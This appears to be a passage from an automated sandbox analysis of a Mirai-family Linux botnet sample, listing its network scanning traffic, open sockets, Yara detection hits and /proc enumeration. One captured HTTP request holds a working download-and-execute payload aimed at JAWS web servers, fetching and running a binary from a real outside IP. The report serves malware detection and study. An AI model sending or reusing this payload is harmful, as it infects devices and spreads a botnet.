      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 44.226.36.193:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 98.65.173.182:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 138.28.144.66:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 35.141.50.8:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 63.215.206.249:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 185.187.51.245:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 138.133.34.70:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 75.204.60.11:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 39.1.231.123:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 109.166.193.173:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 5.40.15.57:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 208.115.230.227:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 79.46.235.48:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 152.9.42.191:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 202.176.18.228:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 89.20.94.182:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 59.93.88.189:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 114.118.71.45:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 88.39.119.212:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 13.131.10.218:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 196.166.233.190:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 178.8.98.45:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 53.144.74.55:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 189.207.112.120:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 14.148.169.200:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 64.228.107.8:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 223.206.138.142:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 124.72.192.165:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 31.78.105.134:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 205.158.34.228:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 164.129.194.221:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 145.245.200.76:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 91.161.82.136:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 141.169.84.124:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 138.249.178.193:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 12.131.72.104:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 57.143.159.209:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 88.251.10.15:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 109.89.31.139:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 112.17.125.5:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 221.72.207.244:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 138.240.53.251:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 180.216.18.38:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 109.223.189.11:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 178.17.62.91:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 136.169.196.47:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 199.46.102.157:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.134.192.6:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 91.243.134.83:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 53.194.90.66:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 34.123.191.202:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 18.210.153.204:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 101.24.70.70:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 128.247.211.146:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 208.72.97.3:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 126.182.52.69:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 48.83.247.55:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 155.92.220.104:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 98.197.250.66:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 157.186.91.239:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 119.147.83.81:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 37.102.243.211:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 42.226.17.22:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 222.149.234.119:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 84.196.114.20:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 184.185.106.66:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 87.101.99.77:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 122.63.26.220:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 125.87.12.236:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 173.240.206.207:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 221.32.9.117:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 166.94.124.174:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 43.200.1.77:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 1.189.233.246:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 99.66.220.194:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 38.142.127.80:60001
      Source: global trafficTCP traffic: 192.168.2.23:19289 -> 165.65.125.61:60001
      Source: /tmp/SLdtSSVlj2 (PID: 5267) Socket: 127.0.0.1::43829
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::0
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::8000
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::9000
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::8080
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::8081
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::53413
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::52869
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::37215
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::81
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::8089
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::8088
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::8083
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::443
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::4444
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::8001
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::49152
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::40960
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::1024
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::1337
      Source: /tmp/SLdtSSVlj2 (PID: 5269) Socket: 0.0.0.0::420
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::23
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::0
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::80
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::60001
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::8000
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::9000
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::8080
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::8081
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::53413
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::52869
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::37215
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::81
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::8089
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::8088
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::8083
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::443
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::4444
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::8001
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::49152
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::40960
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::1024
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::1337
      Source: /tmp/SLdtSSVlj2 (PID: 5275) Socket: 0.0.0.0::420
      Source: /lib/systemd/systemd-journald (PID: 5325) Socket: <unknown socket type>:unknown
      Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
      Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
      Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: JAWS/1.0 Jan 21 2017 Content-Type: text/html; charset=UTF-8 Content-length: 213
      Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive

      System Summary:

      Malicious sample detected (through community Yara rule)
      Source: SLdtSSVlj2, type: SAMPLE, Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
      Source: SLdtSSVlj2, type: SAMPLE, Matched rule: Detects ELF malware Mirai related, Author: Florian Roth
      Source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
      Source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects ELF malware Mirai related, Author: Florian Roth
      Source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
      Source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects ELF malware Mirai related, Author: Florian Roth
      Source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
      Source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects ELF malware Mirai related, Author: Florian Roth
      Source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
      Source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects ELF malware Mirai related, Author: Florian Roth
      Source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
      Source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects ELF malware Mirai related, Author: Florian Roth
      Source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
      Source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects ELF malware Mirai related, Author: Florian Roth
      Source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects Mirai Botnet Malware, Author: Florian Roth
      Source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Detects ELF malware Mirai related, Author: Florian Roth
      Sample tries to kill multiple processes (SIGKILL)Show sources
      Source: SLdtSSVlj2, type: SAMPLE, Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: SLdtSSVlj2, type: SAMPLE, Matched rule: Mirai_Botnet_Malware date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: SLdtSSVlj2, type: SAMPLE, Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5275.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5276.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Mirai_Botnet_Malware date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Mirai_Botnet_Malware date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5270.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Mirai_Botnet_Malware date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Mirai_Botnet_Malware date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Mirai_Botnet_Malware date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5271.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5267.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Mirai_Botnet_Malware date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: 5280.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5279.1.000000002ac99f32.000000004dded084.rw-.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
      Source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: Mirai_Botnet_Malware date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY, Matched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
      Source: ELF static info symbol of initial sample: .symtab present: no
      Source: classification engine: Classification label: mal100.spre.troj.lin@0/4@0/0

      Persistence and Installation Behavior:

      Sample reads /proc/mounts (often used for finding a writable filesystem)
      Source: /usr/bin/dbus-daemon (PID: 5309)File: /proc/5309/mounts
      Source: /bin/fusermount (PID: 5324)File: /proc/5324/mounts
      Source: /lib/systemd/systemd-journald (PID: 5325)Reads from proc file: /proc/meminfo
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1582/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/2033/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/670/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/793/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/793/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1579/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1612/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/674/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1335/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/796/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/796/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/675/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1334/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1532/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1576/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/676/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/797/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/797/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/677/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/799/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/799/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/910/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/912/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/912/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/759/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/759/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/517/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/918/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/918/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1594/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1349/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/761/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/761/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/884/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/884/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1389/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1983/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/2038/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/720/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/720/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1344/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1465/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1586/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/721/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/721/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1860/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1463/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/800/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/800/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/801/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/801/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/847/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/847/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/491/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/491/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/2009/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/772/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/772/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1599/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/774/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/774/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1477/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/654/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/896/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1476/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1872/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/655/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1475/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/777/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/777/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/656/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/657/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/658/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/658/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/936/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/936/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/419/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1809/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1494/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1601/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/420/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1886/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/2018/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1489/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/785/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/785/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/2014/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1320/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/667/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/788/fd
